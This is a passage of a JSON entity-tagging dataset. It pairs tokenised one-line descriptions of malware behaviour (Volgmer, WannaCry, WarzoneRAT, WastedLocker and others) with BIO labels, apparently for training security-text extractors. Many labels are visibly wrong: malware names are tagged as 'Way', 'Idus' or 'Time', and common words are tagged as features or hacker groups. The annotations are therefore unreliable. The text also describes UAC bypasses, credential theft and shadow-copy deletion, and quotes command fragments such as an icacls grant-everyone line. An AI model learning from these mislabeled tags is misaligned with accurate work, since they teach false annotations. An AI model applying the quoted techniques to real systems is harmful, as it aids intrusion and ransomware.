"O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VaporRage", "can", "deobfuscate", "XOR-encoded", "shellcode", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VaporRage", "has", "the", "ability", "to", "check", "for", "the", "presence", "of", "a", "specific", "DLL", "and", "terminate", "if", "it", "is", "not", "found." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VaporRage", "has", "the", "ability", "to", "download", "malicious", "shellcode", "to", "compromised", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VaporRage", "can", "use", "HTTP", "to", "download", "shellcode", "from", "compromised", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Vasport", "can", "download", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O" ] }, { "tokens": [ "Vasport", "is", "capable", "of", "tunneling", "though", "a", "proxy." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Vasport", "copies", "itself", "to", "disk", "and", "creates", "an", "associated", "run", "key", "Registry", "entry", "to", "establish." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Vasport", "creates", "a", "backdoor", "by", "making", "a", "connection", "using", "a", "HTTP", "POST." ], "ner_tags": [ "B-Idus", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Some", "Volgmer", "variants", "use", "SSL", "to", "encrypt", "C2", "communications." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "deobfuscates", "its", "strings", "and", "APIs", "once", "its", "executed." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "A", "Volgmer", "variant", "is", "encoded", "using", "a", "simple", "XOR", "cipher." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "can", "delete", "files", "and", "itself", "after", "infection", "to", "avoid", "analysis." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "can", "list", "directories", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "stores", "an", "encoded", "configuration", "file", "in", "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Volgmer", "can", "download", "remote", "files", "and", "additional", "payloads", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Volgmer", "variants", "add", "new", "services", "with", "display", "names", "generated", "by", "a", "list", "of", "hard-coded", "strings", "such", "as", "Application,", "Background,", "Security,", "and", "Windows,", "presumably", "as", "a", "way", "to", "masquerade", "as", "a", "legitimate", "service." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "modifies", "the", "Registry", "to", "store", "an", "encoded", "configuration", "file", "in", "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Volgmer", "executes", "payloads", "using", "the", "Windows", "API", "call", "CreateProcessW()." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Volgmer", "can", "gather", "a", "list", "of", "processes." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Volgmer", "checks", "the", "system", "for", "certain", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "uses", "a", "simple", "XOR", "cipher", "to", "encrypt", "traffic", "and", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Volgmer", "can", "gather", "system", "information,", "the", "computer", "name,", "OS", "version,", "drive", "and", "serial", "information", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "can", "gather", "the", "IP", "address", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "can", "gather", "information", "about", "TCP", "connection", "state." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "queries", "the", "system", "to", "identify", "existing", "services." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "can", "execute", "commands", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Volgmer", "installs", "a", "copy", "of", "itself", "in", "a", "randomly", "selected", "service,", "then", "overwrites", "the", "ServiceDLL", "entry", "in", "the", "service's", "Registry", "entry.", "Some", "Volgmer", "variants", "also", "install", ".dll", "files", "as", "services", "with", "names", "generated", "by", "a", "list", "of", "hard-coded", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WARPWIRE", "can", "embed", "itself", "into", "a", "legitimate", "file", "on", "compromised", "Ivanti", "Connect", "Secure", "VPNs." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WARPWIRE", "can", "send", "captured", "credentials", "to", "C2", "via", "HTTP", "`GET`", "or", "`POST`", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WARPWIRE", "is", "a", "credential", "harvester", "written", "in", "JavaScript." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "WARPWIRE", "can", "Base64", "encode", "captured", "credentials", "with", "`btoa()`", "prior", "to", "sending", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WARPWIRE", "can", "capture", "credentials", "submitted", "during", "the", "web", "logon", "process", "in", "order", "to", "access", "layer", "seven", "applications", "such", "as", "RDP." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Variants", "of", "WEBC2", "achieve", "persistence", "by", "using", "DLL", "search", "order", "hijacking,", "usually", "by", "copying", "the", "DLL", "file", "to", "<code>%SYSTEMROOT%</code>", "(<code>C:\\WINDOWS\\ntshrui.dll</code>)." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WEBC2", "can", "download", "and", "execute", "a", "file." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "WEBC2", "can", "open", "an", "interactive", "command", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WINDSHIELD", "is", "capable", "of", "file", "deletion", "along", "with", "other", "file", "system", "interaction." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WINDSHIELD", "C2", "traffic", "can", "communicate", "via", "TCP", "raw", "sockets." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "WINDSHIELD", "can", "gather", "Registry", "values." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "WINDSHIELD", "can", "gather", "the", "victim", "computer", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WINDSHIELD", "can", "gather", "the", "victim", "user", "name." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "enumerate", "active", "windows." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "create", "a", "reverse", "shell", "that", "utilizes", "statically-linked", "Wine", "cmd.exe", "code", "to", "emulate", "Windows", "command", "prompt", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "enumerate", "files", "and", "directories." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "enumerate", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "gather", "information", "about", "the", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "gather", "information", "on", "the", "victim", "username." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WINERACK", "can", "enumerate", "services." ], "ner_tags": [ "B-Way", "O", "B-Features", "O" ] }, { "tokens": [ "WIREFIRE", "can", "modify", "the", "`visits.py`", "component", "of", "Ivanti", "Connect", "Secure", "VPNs", "for", "file", "download", "and", "arbitrary", "command", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIREFIRE", "can", "decode,", "decrypt,", "and", "decompress", "data", "received", "in", "C2", "HTTP", "`POST`", "requests." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIREFIRE", "has", "the", "ability", "to", "download", "files", "to", "compromised", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "WIREFIRE", "can", "Base64", "encode", "process", "output", "sent", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIREFIRE", "can", "AES", "encrypt", "process", "output", "sent", "from", "compromised", "devices", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIREFIRE", "can", "respond", "to", "specific", "HTTP", "`POST`", "requests", "to", "`/api/v1/cav/client/visits`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WIREFIRE", "is", "a", "web", "shell", "that", "can", "download", "files", "to", "and", "execute", "arbitrary", "commands", "from", "compromised", "Ivanti", "Connect", "Secure", "VPNs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "uses", "Tor", "for", "command", "and", "control", "traffic", "and", "routes", "a", "custom", "cryptographic", "protocol", "over", "the", "Tor", "circuit." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "encrypts", "user", "files", "and", "demands", "that", "a", "ransom", "be", "paid", "in", "Bitcoin", "to", "decrypt", "those", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "uses", "an", "exploit", "in", "SMBv1", "to", "spread", "itself", "to", "other", "remote", "systems", "on", "a", "network." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "searches", "for", "variety", "of", "user", "files", "by", "file", "extension", "before", "encrypting", "them", "using", "RSA", "and", "AES,", "including", "Office,", "PDF,", "image,", "audio,", "video,", "source", "code,", "archive/compression", "format,", "and", "key", "and", "certificate", "files." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "uses", "<code>attrib", "+h</code>", "to", "make", "some", "of", "its", "files", "hidden." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "uses", "<code>vssadmin</code>,", "<code>wbadmin</code>,", "<code>bcdedit</code>,", "and", "<code>wmic</code>", "to", "delete", "and", "disable", "operating", "system", "recovery", "features." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "attempts", "to", "copy", "itself", "to", "remote", "computers", "after", "gaining", "access", "via", "an", "SMB", "exploit." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp" ] }, { "tokens": [ "WannaCry", "uses", "Tor", "for", "command", "and", "control", "traffic." ], "ner_tags": [ "B-Way", "O", "B-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "WannaCry", "contains", "a", "thread", "that", "will", "attempt", "to", "scan", "for", "new", "attached", "drives", "every", "few", "seconds.", "If", "one", "is", "identified,", "it", "will", "encrypt", "the", "files", "on", "the", "attached", "device." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "enumerates", "current", "remote", "desktop", "sessions", "and", "tries", "to", "execute", "the", "malware", "on", "each", "session." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "scans", "its", "local", "network", "segment", "for", "remote", "systems", "to", "try", "to", "exploit", "and", "copy", "itself", "to." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "attempts", "to", "kill", "processes", "associated", "with", "Exchange,", "Microsoft", "SQL", "Server,", "and", "MySQL", "to", "make", "it", "possible", "to", "encrypt", "their", "data", "stores." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "WannaCry", "will", "attempt", "to", "determine", "the", "local", "network", "segment", "it", "is", "a", "part", "of." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "uses", "<code>attrib", "+h</code>", "and", "<code>icacls", ".", "/grant", "Everyone:F", "/T", "/C", "/Q</code>", "to", "make", "some", "of", "its", "files", "hidden", "and", "grant", "all", "users", "full", "access", "controls." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "utilizes", "<code>wmic</code>", "to", "delete", "shadow", "copies." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WannaCry", "creates", "the", "service", "\"mssecsvc2.0\"", "with", "the", "display", "name", "\"Microsoft", "Security", "Center", "(2.0)", "Service.\"" ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "use", "`sdclt.exe`", "to", "bypass", "UAC", "in", "Windows", "10", "to", "escalate", "privileges;", "for", "older", "Windows", "versions", "WarzoneRAT", "can", "use", "the", "IFileOperation", "exploit", "to", "bypass", "the", "UAC", "module." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Features", "B-Exp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "perform", "COM", "hijacking", "by", "setting", "the", "path", "to", "itself", "to", "the", "`HKCU\\Software\\Classes\\Folder\\shell\\open\\command`", "key", "with", "a", "`DelegateExecute`", "parameter." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "capability", "to", "grab", "passwords", "from", "numerous", "web", "browsers", "as", "well", "as", "from", "Outlook", "and", "Thunderbird", "email", "clients." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "use", "XOR", "0x45", "to", "decrypt", "obfuscated", "code." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "disarm", "Windows", "Defender", "during", "the", "UAC", "process", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "send", "collected", "victim", "data", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "enumerate", "directories", "on", "a", "compromise", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "ability", "of", "performing", "remote", "desktop", "access", "via", "a", "hVNC", "window", "for", "decreased", "visibility." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "masquerade", "the", "Process", "Environment", "Block", "on", "a", "compromised", "host", "to", "hide", "it's", "attempts", "to", "elevate", "privileges", "through", "`IFileOperation`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "capability", "to", "install", "a", "live", "and", "offline", "keylogger,", "including", "through", "the", "use", "of", "the", "`GetAsyncKeyState`", "Windows", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "relied", "on", "a", "victim", "to", "open", "a", "malicious", "attachment", "within", "an", "email", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "create", "`HKCU\\Software\\Classes\\Folder\\shell\\open\\command`", "as", "a", "new", "registry", "key", "during", "privilege", "escalation." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "use", "a", "variety", "of", "API", "calls", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "communicate", "with", "its", "C2", "server", "via", "TCP", "over", "port", "5200." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "use", "PowerShell", "to", "download", "files", "and", "execute", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "obtain", "a", "list", "of", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "ability", "to", "inject", "malicious", "DLLs", "into", "a", "specific", "process", "for", "privilege", "escalation." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "capability", "to", "act", "as", "a", "reverse", "proxy." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "add", "itself", "to", "the", "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", "and", "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UIF2IS20VK`", "Registry", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "ability", "to", "control", "an", "infected", "PC", "using", "RDP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "WarzoneRAT", "can", "include", "a", "rootkit", "to", "hide", "processes,", "files,", "and", "startup." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "been", "distributed", "as", "a", "malicious", "attachment", "within", "an", "email." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "WarzoneRAT", "can", "encrypt", "its", "C2", "with", "RC4", "with", "the", "password", "`warzone160\\x00`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "WarzoneRAT", "can", "collect", "compromised", "host", "information,", "including", "OS", "version,", "PC", "name,", "RAM", "size,", "and", "CPU", "details." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "been", "install", "via", "template", "injection", "through", "a", "malicious", "DLL", "embedded", "within", "a", "template", "RTF", "in", "a", "Word", "document." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "B-Way", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "I-SamFile", "O" ] }, { "tokens": [ "WarzoneRAT", "has", "the", "ability", "of", "performing", "remote", "desktop", "access", "via", "a", "VNC", "console." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "access", "the", "webcam", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WarzoneRAT", "can", "use", "`cmd.exe`", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "contains", "junk", "code", "to", "increase", "its", "entropy", "and", "hide", "the", "actual", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "perform", "a", "UAC", "bypass", "if", "it", "is", "not", "executed", "with", "administrator", "rights", "or", "if", "the", "infected", "host", "runs", "Windows", "Vista", "or", "later." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "has", "performed", "DLL", "hijacking", "before", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "encrypt", "data", "and", "leave", "a", "ransom", "note." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "WastedLocker's", "custom", "cryptor,", "CryptOne,", "used", "an", "XOR", "based", "algorithm", "to", "decrypt", "the", "payload." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "WastedLocker", "payload", "includes", "encrypted", "strings", "stored", "within", "the", ".bss", "section", "of", "the", "binary", "file." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Features", "I-Features", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "enumerate", "files", "and", "directories", "just", "prior", "to", "encryption." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "has", "copied", "a", "random", "file", "from", "the", "Windows", "System32", "folder", "to", "the", "<code>%APPDATA%</code>", "location", "under", "a", "different", "hidden", "filename." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "delete", "shadow", "volumes." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "WastedLocker", "can", "modify", "registry", "values", "within", "the", "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Internet", "Settings\\ZoneMap</code>", "registry", "key." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "has", "the", "ability", "to", "save", "and", "execute", "files", "as", "an", "alternate", "data", "stream", "(ADS)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker's", "custom", "crypter,", "CryptOne,", "leveraged", "the", "VirtualAlloc()", "API", "function", "to", "help", "execute", "the", "payload." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "identify", "network", "adjacent", "and", "accessible", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "enumerate", "removable", "drives", "prior", "to", "the", "encryption", "process." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "checks", "for", "specific", "registry", "keys", "related", "to", "the", "<code>UCOMIEnumConnections</code>", "and", "<code>IActiveScriptParseProcedure32</code>", "interfaces." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "can", "execute", "itself", "as", "a", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WastedLocker", "checked", "if", "UCOMIEnumConnections", "and", "IActiveScriptParseProcedure32", "Registry", "keys", "were", "detected", "as", "part", "of", "its", "anti-analysis", "technique." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", 